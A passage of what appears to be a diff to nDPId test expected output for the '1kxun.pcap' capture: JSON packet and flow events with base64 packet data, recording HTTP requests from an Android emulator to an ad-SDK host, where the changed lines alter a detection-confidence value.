ZqiHcEOI\/xI9FPpfiOwRWf2DPy+D\/FHyp7KzBwzkQkdc5P0SwR0iT0x4nkVQetvDUn8aCBUbz09Pz67gcxcbm7b8uF39wTMBPHU+Ifi7P\/+hNKzSs3hcvw20bZ2FIuXH0avcL7oPC6lPKZSDcWr76jNpjNpYk8uYX+V28Ub+2rpglw3yHdxQxookD2isPoPuwD1jlewb2D6IctFdSIm+w\/Zf3xRxA6STk0UetBkkHLPZxVta55o7Zn73t00Cbpj\/th\/SK\/CY24Cj3M6F31c2E8hqIh\/lRaF3ld\/HVs3oQAwvz1NJVuk\/47Q\/0uMU+EwuwBopxSRIThXyjyXvoLpCZCh9cSBf3B2bo4ie0W7L\/GXVboE0OWenVZ+0PWurXvHK3+JX4wQCFwW55uXEloNP76fZCjAEr3CX4t7QaUA8GiLYxNBtH9UyqRTzuk91VlQ+YKR7WdqbUDlRusWV2IE4A3fsvTwckEmfbwuLqlwQqNCKaOfadCiMP5oP8B3JK6S8pGgBiG824Drhb2UOwvRo\/cGOIvAmSIuv4l02e1Zu7H2junWlVhR9o7oUreho5AkoQcNXeyj1zdMfhE\/qXLzN0aN1FUP4D\/RfkWJmQ4W+03nLiuqY+CDASxVNYX5eT+ctUzMJUH3tadi+YC8tIJmIlJp+OXhoGafcrEpHI7ldn9zuzZMetfuZcR07PEwoDQIptcPnDkCNMuWQ3CyHK9gM3R55O871qh1ISHtaMlHeVEvh5iCSEay9mGUM76LtJ8eB6we\/rIv0ife6hqx+ylA32SahXgsnDK64t\/kePph3Cpr2dXfjPaiJUAV13WxqT9PXQl307hp6+PciT\/RRalj7JGBJaKFxGUHOzbAKVzhmpAO2F1\/LjKkR36fJQTcFfxgNmgfiOmN+RfH7Yk76MvFabxD+2DuZLszyDjHHz1jrEG3qIbLRYwTpBT1ArOzvhebj4aKNnk1yYj3OLq2+VvDDPvaz5qCX2XE31vAtgSM4axL6C8crzfJ1GrhONX8E3aEt9LAqDfJNA5gCT\/nO6vaCMZUjttP31Fyg3rZ9badwXFpPhKFYfC\/WY1a+O\/+wBVEEz7Lk2t7x7Pq\/\/\/bW7t9\/vb3havf7t73h28HAbf\/\/n+Wl\/aJBBqfjB8vtKk0my+d\/+U1FOrn5P\/l9bq+\/X3K73G77Pk4NvMyoCFw\/\/xJB+OHwRe7\/s\/mix\/Xn93h\/tz8Pe5mfznd\/7x3O9+x356do2919ifP7876+sY+PHsvSLy\/n9a\/Tg8M\/Nuve+vJs2VrafwAqz0tudm60ws6Wl1QUXRXNCIBdjmGALJSEYb8MIIKVssOU2rYHxl1q\/Uc2MP1L9ckqLPk7nfNz\/ouOdgnQBtijNss1Ttm276pRt\/mXbtm3brlO2bdu27b63Jya6Z6I7IndkPqx82ZFrZebL1\/nESAKa8JdDiUY7SRKUv\/TEscD0eEmHfWnKsIC\/0pgDfqOehe3YocrFxcQUoNPl8ygCarTVURKtYe6Ufin5mjYNYN+U78DExOx1pt+Ut50PuSUIwem9tv6ysTrcd3Bpd+i62fotcXoS8KWKFdhCqKV\/P5T\/OiGpAvTW4r8W9HLFxlxzT0eiXngHhWOgJBrrhSEVZBSsaOd0Nc+UflCOS0RbV\/EYtp8W0zZKboYpUMc1GKXyePUpdjcllZCyFvHT\/9HqTJLUyyWDFnqWS0D8nJh5Y92IkMpZAVjhC9virUc3XS++Ddch0jMAS6rmEaxrSsvDUyy4AQsc7ZcCrKweap3zbN9S+tYy5ACkTim9ROHF2JRORwNYmIO4r3\/i0tXqapZ9J8SXZhI1NjuoUvUIiRdwJyV82CRoxKcIQkgW9s2o+Wzf4zha6sqlbdSZIUxnwP8x4zwbnSdR3rYj5s28EmcqpaXZmKd1fHYPicaQZA4wq7B\/8Bx0D\/i3RSKfjVRtWaM5OnFe
o81rmnU6dTrVPVoB+3VX73mKiYh8B7i8JKvDNFfUsCKttEBpaZCxhNSE6pp6KLD70pU3pbqImpzPRHFILNbBJ\/u2PR4c7a2\/+jSfiQEc9VLWrcOTOg0o2FMfv0ZP6xAieGjq5Gvd2UINUm8bCqvZ+nW8TGy+nsya74sKOlBcAFavG1rdnqcc+EZrCIqCnT+Zu5Nrew28GwzbAN8Yk3fNZ1REgcAgnJsXnJvlYU8xcIWjidFkI+sFoS8uUPdhyCEveLesPuTOSqhVQd8nj5tPCaLePVWssKd9p\/AsV+nAJ4mMLEl8GAab"} 06293{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":4350,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":4350,"pkt_l4_len":4316,"thread_ts_msec":1654385184969,"pkt":"nLbQ0+MztKXvZygQCABFABDwKK8AAPgGTNQSQGcewKgCfgBQjy5+eIF70XpgIYAYAINNZwAAAQEICvuAHVOcUadR+OEAbsaEV4ATs1KWNFGTmcPU4ah2dE6ss+8j7HasEYjyQ8ziHPOiHkIxj1A5a3PYkXlKr5mNKYD3r6jOwEB8EUYHESkmKncUQQjfuQcyaXe6+v3CpZhAGHSefk\/hCi3lXmAh8Zlr3l9WPQDHGS3ZzfLWAeS0\/eIMH5Q\/xCkJ2\/FKzVL5CEJFUMHrR9+nBartpqxP05ypzIuWYoty\/EKPzESUaLPvsACxjxpuq1\/EShw3xehTGP4lzW9ELxZo4ob8rmKWH5xy81PCe2ClfOroISutHqD40zQvj0hnRmWBK0W0myUEZVRV4IMAalDU53Qm4o0CJHBr8WfegeEqTB7qyZYAoNfSwv1EgIVkqmb349jAhaCVk7q7PFuOOZzkel9fx8Ix80FwYCi+Ikda2bl9y\/BPQMvOPaYpe0RMRQZoe+Gt2My+l5MoRv7hgdlLBXsuD2suT600hhgez9ouAPy6W2l3cGiugYJeL6TOvCuCaPEnNWXGkedl\/U\/+5nmRhjgGR4vHBT97b7fNYLG2+jWxOXIGyJ3T6nn7cy33on9p6RW3okfOgPcUrQ7uOs32YIxNW7s5UJ3X4LPxNrPJyBYoVPzIKK7qXFwGMIUDsETi0zXDALFxESgJ+vfd\/Qpqg8UeIWn0vCvQfDTaBiz2G5bFILF\/31VLz+f7kf3t8eOqHaL2HH\/BLl\/IlUB4UQsB0puS0Vm9N2Zj3qlvfNtr73ZJJ9GNfy6DqkemWGY66QWKyO8Q6xN13zxzNWEnm2ACzLoRMy4bM+fpP15m2LeG+DdezfkHUfDWFmQq5Bh5jJsKf5Z0zeuHh8TOfgElYumVfTCjzNsHNsZKBxRXnKaxChci4RywELTlmtnkxdieWYG6QFq+dAetgwUvzY6oazaVirbGGuEdq3txTwnbL3PS2+bi89k\/xZnllSwTG5aoSJ1ffVF5TQfV5i6PFHR4IrYu2tk+ax2FTAKrZBj\/DOU+CdLbxNKqj\/fPafmSaHDhg2H3k0OlcAkBoPd+FnYCns52k6+r2jXP4cnifWEX1biQB4+plOKZgd+oGchPX+MARL3eCzTayIP57BtnyaXEa5frcmwoeTxuy\/vdpJUO7lTEqGNEJgSangDUvgdtN+hREdf86wXhUYvrwXjaT07Pqx9dG+F\/wPN1o37+4ZP8r4lVBbspJZovHg\/4zTvf7g9f01m2
bn6n0zOTqB+ve1y2Xb6L3D0dAy2tBwif9sdDGanumq+Koa\/lw34VcWK4eK\/q\/O1dvNwIavzop\/C781sdEmRuohjSCqPyalurO\/jlrNhM6pzLJdDE3QT+bsW4\/y6RyXPwuRMhYWfH3JPNsM4TQsxotY8tYPxza8tX0+1LiZntZNvB3CsNJTa5QJVUhwwS24pMRHpfSP9VqeVkbVwl52V414SI9r4U719W\/7hQA5xwPps\/4XdLR68iiNZaRj3wt02axL9TcJG296k0BxfZJe0HRGKjOcbVuQFgA13l7YrvP\/5uHbYRO3pSY4m4ZTW5M7YbF+OXzgaJhfGAOSvKbFICZhAMu6Tv9ULfJZnxyUnTlEy2Ejld8Fdve4qXCh5AacIxapgw1fzRLUvKLKI7EQ5tlJ9VTZqvnaV1yE8ORUeDjmyDE1lKia8bdRJ8teb5Xuh5fEJodTAd1kEiKZQk+qdBLxsXhVNnc21\/CldJSVD3FxKqRlhnys91y8riM0a3xkOOTNsYlHxDA8u0Rirfmd7Zqwa2om77b0FldUFXrq0\/btgCQtDK8Pv4uXd8Ui7Rsvr0h50bzhu90QmZ40ZxHIrt\/ecFfnXIcJZbQFrq7lUN9uXHkpkx0I8mcGsDRHN9S2mZ8qJIKCD4RQ29lRYx5yCVILHczNtAYQhE\/o2A09TGUmkAsWLqpyS3oaZEDBVHXmsu3iQ5cu0swcPeYxyAczTsWfOQBc2a5KlPPw93TmcxVuBqmBM2Hl2qi3XnRcr+Zvdr7h6dTASazwnchFdbU7BHqKkddBscp1K0W0wGZzrg9c8som0myjCFpPBelNTXZ0ZrdIftsO2AK+4Qhkztt8Vgq7aajy2AiP8Rtb4nrB9sp3F\/\/qhNoMivutuGtpAUf+7xAvJKtvf1F+j\/jvGB\/n8BPRY2Zv8\/jg9MuffyEtD\/wztC+d9l\/xvzSPa\/zKOQ3SVicA7Njin0LiEkvgDMu7IbMCHkVl0P+jjTSV6\/fJcCHLFdyMHWM5kF60QZoLU3hVh\/oHx\/HApnJUYt4yaPJaMrhdTPZdP2bduOUcv5pZfLDrZYjS5Fhv8Sj1YZ1ZneruygiHriTf3CnQtpWu+9\/p4isgXE\/nfNxFDk1JEPincuqm5rqzVyMsjZWC9SLyjO3d1kTPQTmkvDevqLJv\/pRzSEaPRuzI51uILUZD6zoTGazXVqtZ8UJXiCGCqy9UicczZRM+mPlLcH8n9vFdL\/3gNHEzcDR+P\/2bH\/pcZUHjKFBwUC+m\/h\/x\/U1nZmdnSG1gZGVvT2tmYRCnLi8DDY\/90OLykhqvSfWe8\/hfFfshKQdYNzIxAQyJKkqJCKxGhzoq6EssGf0bz6TKQLVgFySzlZh1AKl2MpO2rZEIX+BbJAF6IUJDJnRcyQkKk5WOVyqA8FqYIvSqX4C3Ki8qEB0wts5cUmxInpuOlSo9Muu1uu23uj5ABuP\/XfU4\/fz5zGNNCZ\/mrmU+JvmaxFm7Udv+B6qPgdUzEILH\/t6s43whh\/w\/LwsCxn9hFhE5Wp7M0nJAhCHCyT\/FSSP4Vkr21T\/lgzsmdCkk+gW+bEKk46gOIj\/tESSJTvSSs1jov2e9LyG+gkdkeV2RGRMKtH7eXL5gt4qILb8T0yK3LgEkgtZEuGRkLMjj1mLbbuKM8nFrEXMLqL0WcElHVJ2FnaiO187TT8b\/eQ1CcKA7CCU0n+Hcf2LZ6nrpwzdJkNVmY8eX33F5WE0d7xHSq4T4L4vGm9+fh0fVG7ELzGVscdsV7\/fAGxJxH+nndwXuyHk22k6pkmuWugv9NFwdispfFkMEECvMJncKKJbZvhHUuGh8TLXt4Dk+MKa4z0CdEHEOb5WbtE2F8ItYlPIBPnEwdpkZt7EHgQfI130YCGbTGjGOWG78S7lGeXu2hbjZTMMxoJT5jpsRmWq6RY7YKI3Nmw0n1o+etAf182TuX9t7oefO
6zEaxG6aVWISs7RqIh1It7I\/e2u1sEw0Z1fDwZcSMjFWpVhBkoraCeYefwUwmSj9adXNL5YqRItbLbUGpPLulhNfN3bbtAlHt31TSjYN5GeBfh8+QU5jgeQY7BsvbjDwPK\/JjZzaJ2fj1ECMxvfq55zEGoHtjrQj2ssHXheJbFF9A9HMI9P+gso\/48eTLceXnriYJt3DVqNN497hURpCNMX5f5S7kpA2\/xT1i3k9dwgNw5uCMo24YhTsvZgyPi49FKAgcfRbEWxbx2nOrig3H73Bgd8eqbmBf2XYcDRFmte4tr9yDpAindBtB3X+o0CDPUxTpQN5UU1kzj9dXcRInA5obGxbZP3Mt\/z7mkmJxorbB+4P83emjHFIt2QYCA8v9jJLz\/m5HMHA08\/uujS7g7p9PjxANDff295yd7aJAFB0HakX440ss1u1GQCi9gfqJauEHsatZtYpjiLqnAr0CsPxnpmhrra1yc7W0e7u9v4GAhYkNDZKQlxSbGx0foaCnJqirLS2xNTS7Oz0\/wcDHRsjLTU3S0NdbW11d4uDnZujrbW3y83V0+3qgNpZLMjIwVXh2coe64u9xsjW+pAYLab\/yhm4ggH2DkGTIOUA+O1HvWt9fHAo33v34\/c7JUMiMdI5mn\/Gb0Nd62beRT1f03xwYjk+sIHhQDpJ1\/drt3h7xWPWY9dt+yrggyP7p\/szt3VvzcKn8WTUbBYVLlWyvu\/+14U3qOdFSwAZTZXHf0l\/R7+1tsfc7RMuqAyXAStf2kBco3nI\/UT0pxrA4xmgQMmXfpRgysHi7VTkpre3cAIMQ71V5tggJPI\/IFc0fwrvWIBJ1qFkusj7\/olDZrbFziBwemeXU400GIUmcbLbp6G707t+KJeQKzyT4zZWmOenRcBD77Y387R2GnKPASWFLfXTy7heYfatWj8nC4NB3oatJ9r3NUTDk7h0KkYasGVE9yvHx4yuQHLiVHG2lw4ux2EwdOrdxeJluyP2N7DPO4t\/m5wdfpdv08NT\/jXDCnODpKm2yyz8fwvs9yOuv\/zmgThOWj36hVvXb6frExTX2npcmftjD8GhJ8+nrltRA2V75Nf2R+PiKmfyXtfj5uhW7K76hvO8u4JVc\/RwlUunXnhvxWHzevY7Cju8JOM+ihQnNvtVUSkpEICbwM3VOfHLLDrjdTvN9Pez3reKp22\/2yTzPArufdZc4uctv90eSd3W\/c32jBWG91CWOHle9ycDglB23ZtZLG6N71CnB6db3xn+4I1Zk+b8X+\/Km1bGtp73kL+SggYBk05gHIdo\/ZtUmO289vTdod0r1K0NbsfVbwNkpW2+WJfHW7paLM38NOZcGrlJD+PH6byFhU22pOfNhwUwp5dny0VztJmYP8z7v7fznjSxOnMYYcGIhUARgI5\/\/oDANjC1szejML06tvI29yg7VW6BHXhXqbTdeF82IeydEWGxw3680Wm\/+Mrc3ZTgLXnfWM9d2bmagcnwuj5boLbbzVe4HZx8rExISjk\/kyyBLIbkjgCBzCoxNbRhF6YJAAwt+oIDCoOsp7bTEZUcnAlAQs3CcBuW6hvkB\/Qf+539Hn3zY8MFzK7Z73aV565flhH6Zl4KUiiD8ZZlkp6tq6zpvzs5yat22qu+7bQF5O18XnDkZ\/YfFGqt2dTKVzjKtYLdVodMlreT1drbaPsFhM5XD4Sq25XW21u9Gs2G31eHxMbfn9fX+AbwgDiLYI9\/cLFGmRmfrn71nrJR2gK0jH6y00g7GQv\/TBQ\/TXS9sTAsVSwMm4TagSVUPYKk16sbNStFQ3eYqdmr08xT7gqcOCmadGRgYTa0rNNCiuMTDOT7PVVinTdFtaItz4IhEWkr5e5OvZv+Rr\/9kJ39zMExTl3gtK76BkthHJKc+ER3bX58+hwFbVf+7v2eM+MCmCfAaB2stSK2UEQAwFHAZPtJYpgX8ByZxbYbgZRwr5MTzbpO
iGAWnyqy16UBgtHVbL6K0+Pd4BJBrbC62z9GL\/nDyux553bUidfT\/iTpBNiNs9l5ynYNNJqF8qqF24gOmO0+amrzRwlSRPi0jJ+0hPIVA8indNwFXk4DP4k2uwBW\/v+Oe80kFedV7\/5SDOvd1B6xQpAQvYBerEXA8av2MK4wDTK8shMjlHk7vsTQiTJs3OhNNCwU0jkXGp2t7xYN+7NKFFBAqFR1aeiJ3DFPacWwkevE+W6OOz45lC4PUf2zWFnQJ35O6\/OeG+nLZULOQtED9Nusw50hebtv7bBnp87nstCikrQfkG8fbFnnUIK8Oiew8WlEQc6sOKsC0GYnaEAb2FTgn+KsQDkBQSYyuAeB7cepmExety3IYmUU9dcjuclZ2Ooxyn3o7pGuKajq3MO76Jy8ekCwci3BoEE4PRTv\/jmfQEizO8\/1ly83ecos5SlFpyIHB4TKMcjYyJphR+yGodKQnSIjQ96fJ3Om9aWiSCmwVM47wNE8KQ7DCdnLOw4GpA0zbv3cT+LUdxXQb9G34MPlmVZprER6YI4lWZjZeqb16bSgJDqZROMoKDSkB68uqFhy6gaR+fkk5Fho9KKlm+1Z5j"} -00973{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":8865,"flow_avg_l4_payload_len":2955,"midstream":1,"thread_ts_msec":1654385184969,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
+00973{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":8865,"flow_avg_l4_payload_len":2955,"midstream":1,"thread_ts_msec":1654385184969,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":328,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":328,"pkt_l4_len":294,"thread_ts_msec":1654385184982,"pkt":"tKXvZygQnLbQ0+MzCABFAAE6JG9AAEAG2MrAqAJ+EkBnHo80AFAYADoNP4BZp4AYAfY9sQAAAQEICpxRp3YAJw3ER0VUIC9ydi9lbmR2NC5odG1sP21vZj0xJmVjX2lkPTQmbW9mX3VpZD05MTE5OSZuX2ltcD0xJnVuaXRfaWQ9ODg4MSZzZGtfdmVyc2lvbj1tYWxfOC43LjQgSFRUUC8xLjENClVzZXItQWdlbnQ6IERhbHZpay8yLjEuMCAoTGludXg7IFU7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMSkNCkhvc3Q6IGh5YmlyZC5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
+00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2407,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385185015,"pkt":"nLbQ0+MztKXvZygQCABFAAXIXwoAAPgGIaESQGcewKgCfgBQjzQ\/gHc7GAA7E4AYAINkpwAAAQEICgAnDeicUad2RWsIZamOljqm7gSNKAkXQCu+hVDQvHNR9FYzcLa6bcMwfHz8+6Ohpq2yX4VCM8MnePOCbl7QzQu6eUE3L+jmBd28oJsXdPPvCN38HeCm8Yfm\/kvPR3Dz+vd\/+5\/+qz\/+F\/\/73\/yP\/8vf\/ov\/+v\/+3\/7l3\/xn\/\/nP6n\/VjBMyedbYcXZ\/o\/OF7mdeh9Hhr\/RfIfMv43vvKuRdCur\/FFM9E59fEn2SOA2NKnl1bdNivqb2mOXNXHq1\/YMX1\/Ovvr+Ls8avbLeJu\/n+XUe8voOwYRiE416SRHkHbuH3JI7AK5hcYzixRhEYhd8jOEmi6zWCkdiKXBEYCfi+gog\/Et\/23iV5mL96vr5z8qbJ03dVHEbNXOMfCP\/4uyrDZ\/hnarl7h38mQu9N1tzbJ+HHYOnfwgd4YKemZxmEk6Yfkz3lh\/aJu5CbeloHFbHt+TJXIpxmxZgsZHiRMOZFvKzyDdgT70P7AneujlPtVyx1Ci8u7Wd7MtsuMwhfTyvOMfV9uKfpBVoFiWcijlTzRwo97G1lTY77npOvQt2eMaaQrdoht73lsx1+nZwl
g+BlIhnXXbgLsHWy5C\/CTrdrpvOys4hB5bmgib5vMJLqdEuhL1RVueIWhr1W24corWULSQqDfGNsr1HdHI4FJV+WwuEwhjFLFwqL5Xy27akNzx1XpbTfbywRws5chR\/VzSRUHZ82JFfLUbM21UlmqXQlB5CS01wcLs0xrplUXKuatlxW\/JnKqnFYcvIJ+HnXlDQp0jzZWW7b+IreDkRwtvod2OSadqez+8PJQr11ODo3W9Sq9lB21UYv1nbZnPkKxY3GO2VJgKi3y86OY2lDWQkA3y1giPPL0I8WU8XJRBa7HXzc3Kr4uITR5JDT0WTaYXbC9v5VWfTptvCOnVLv18ciGZlm2dHCfrfBJ8PAq77hGFHEh2RHh+SoYiYL45XZJMJ1SZZMbDASfdSvphUfow01aDWyqsWVpJirq1bhq16jM844FVx6sRj6QlADNWTuRMUGtyRUymqEmNkJt0Yb1N1graqbbda1j4vrOEyE7tb2An3aY8uYGHAX8\/rsNN6gbsLJaXGuswDrrwixB2A37Y+RJEMuQhm9tVPq3bKPTkuFNlJk4shWDhxGJ4gRxe1aHQH+OdOeb5ZAybp4QOtbdJVZhbI7fRHTpmi3Db68nJpjZBHlst+pE6dd\/auVOTRGjFYfMxlXYZeV5CtjfADQStuORhXR14nj+JExkEESLQhVIgsxAsrbUusYDOsmiIS0OxhmECNGsnePTqNm9Ybk0jiCIUUMk0Q6bo9XikfzcXHRxBU2KhFA7wFnV9mu0s+4T+Cmvs31pVGdu01zTdMqOQbatST8XeSiGb9xLLVobbjVxgASHcVY6Z0cEk1Zw70WhNMSziSBuvEt6nPBEkkYPUs89VCHjedyHoevTwhpwRtTvVC9cjscTpkEl70Q5ZcEM0iBVlOrZshoxaxTCyVqkcFaQaTJND7qiruC9vSgHxhROJty2frJRGcUkW\/T8bzArQu62Aj8pZfq5WnpurUmhYNXBBstPB0HdLEt67HP9CUNcHaVL\/py5Tv+IiqnHSGMtLAtT2aEyysT7VlU2B1c0UynpCL4dONoCBQZiWBCCob59IQIU9r6hD5FW92974pfH398cuCh13wO5v+Bzpq+x4zOk7NmVkyoZTPht8XqNPclVgd+dr30ls5urO+xrXKEf+KEQVxrl2X5Oea+B7dP8f2vfeAhlpy7jKenuJahub4U2SPWInq+hVn3Kp7Xjnw5Mt72ttIa3qJmWSX5OaelWMO1q4cTtae5TXSrzL1EZlCA5nHYN3tCgikSvSDqTjQq48xf4eq4x89aD51T5RZZJ\/zYX3eIruVriHTZcy9vlhIyXU6UT8Gkvj5OMbHU"} 
04442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2922,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2922,"pkt_l4_len":2888,"thread_ts_msec":1654385185015,"pkt":"nLbQ0+MztKXvZygQCABFAAtcXwsAAPgGHAwSQGcewKgCfgBQjzQ\/gHzPGAA7E4AYAINH0wAAAQEICgAnDeicUad24XFtV7Rg10duU4UTlxkMf+4hbiOeKWSTGwnHrK\/bcVHDmrmHVT1QbFoe9jUro5dI5TdYvpHS0y1rjoh+0U3zcCtX9rblxRoi5FhuCbqzSJTCJ\/SCO4zZZSPYNE6w5HSVgAaV0y2oWClZOTWZhlvMk\/XLRpM2IbCWurCzT+9+nnf\/OWUMYJ35yVcMM8b6\/R\/\/1f\/5x\/\/+v\/rM8TWeCOPgXR\/Wn9HNbJqvANEK619BcRX6k+IzZvpCAIbt5MNPYdScnyfOCY1\/TyD1rf7duf9o+anpe+Lk86r6HoqW4GHx6Znn1+7nR8VPBz8nS9L5cAeE+tP9z7LkZg6+ssfPLHPhW3ltM+PZT5K8\/\/msfZakyRs7mbt7Xv7\/5l\/\/85\/obM72VPyqzrNvqjRrU2d+wff86N\/86\/\/y1dOAvpLFbex7cuAdHr+ancs7IF7TArMobu\/azMv7LMnv2ZI\/Gupcy2kBmgQdfr79Efcrp\/mm7gDzHc7PmZXzYaydhcl9sn\/Bdl7f8evdzu42\/KM6\/2CPyGFz2XrOAlzQ68abCb\/NI1L4Z494f\/7\/wYeXvY12b\/v45AFpVjEKiukvMgW7N34KJ1mHT5uII8wicQAf7cIJq5oahpZLfYWtbiLN8Nh5vTFcczsoLYRSQOpr5+wJefBB0Bcjqs8OVij5zI4Q8US3kT6+pov1ZlWX1ZbBLAo\/CWVvJs7o7OLKwNZicOUC1akI83ha4yIZMssUw8P1miwuy6UgRf4eU5Z4nB6XmLKp3MOmhnDsUnscvDaHlhO5ju5pELGc1S1KGIjCWSnZkCldR8tC3DNDZhx2FKPl6Ci6COlwEwia\/ctaSG\/KNTGIWOI6zxgGatnGGthaTk1Dl52EoUGrXjVsYFdBMq6zs3e4rH0Kz4xNdXR5SSjlJSGkp+XAetsK67orj5IjKZ9wGSH8hV8441VbQeRVqYj9GmcyBGz12el6BMEvIWJjscDyTLrh3gbg\/hA7bG\/IFWoEHieVcL0Fga3fQZtUIvBGrA4DAHWEdWYmHNmovkcclhbSpgp39QFulyfMoKwtehAkztJTKuJ6VmqPjURtjSFB1eFWH1Yc7LQ6dAu7tRLspVXE29p+fTlt3DU5BIU4qVWEQhjVxOQJJno\/tO47JaUb5kHb4cxZFH\/xjOAXlxRYQ3maguAXxIPDq5+U3s2e6xvHBz+qA9znj+qA0r3OzF78\/m\/\/m3\/x5GWK3\/9f\/8f\/9On2j\/\/DZ+rf\/K\/\/8y+4ISevvLvD+vmDL13\/qNtPXbbJM1cS1\/MvdrRzDv0vjv8pQXvOIP9JD\/cE7a+oLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwnaLwna3zq1eknQnu9fUpheUpheUpheUpheUpheUpheUpj+Q0th+u1o6CVB+wXdvK
